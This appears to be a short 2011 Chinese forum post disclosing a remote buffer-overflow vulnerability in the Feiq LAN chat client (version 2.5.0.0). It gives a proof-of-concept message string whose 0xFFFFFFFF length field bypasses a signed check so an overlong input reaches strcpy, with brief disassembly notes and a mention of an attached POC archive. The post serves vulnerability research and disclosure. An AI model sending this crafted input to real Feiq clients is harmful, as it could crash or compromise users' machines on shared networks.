• 飞秋远程可利用0day

这是人生中的第一个0day,在此发表留个脚印,本漏洞发现于2011.11.21(昨天)。
飞秋是一款很流行的区域网聊天工具,很多校内网(我学校就用这个聊天的)和公司内部都在使用。

声明:本贴只用于学习交流,如使用本帖技术用于非法用途,后果自负。
测试版本:虚拟机中Windows XP SP3,飞秋版本为2.5.0.0。

漏洞分析:
POC:
1_lbt4_1#65664#6CF04987CC1A#570#31741#4294967295#2.5a:1317316152:admin:XXCCLI-A10D5C26:0:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.......

sub_4405A0为从ecx指向的字符串中提取出第五个和第六个#之间的字符串。
ecx指向的是:1#65664#6CF04987CC1A#570#31741#4294967295#2.5a:1317316152:admin:XXCCLI-A10D5C26:0:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.......
eax为输出地址,运行后var_4024为字符串4294967295(0xFFFFFFFF)

运行后var_4028位0xFFFFFFFF


绕过有符号比较,进入strcpy,esi指向AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.......
结果图:

上传的附件 飞秋POC代码.rar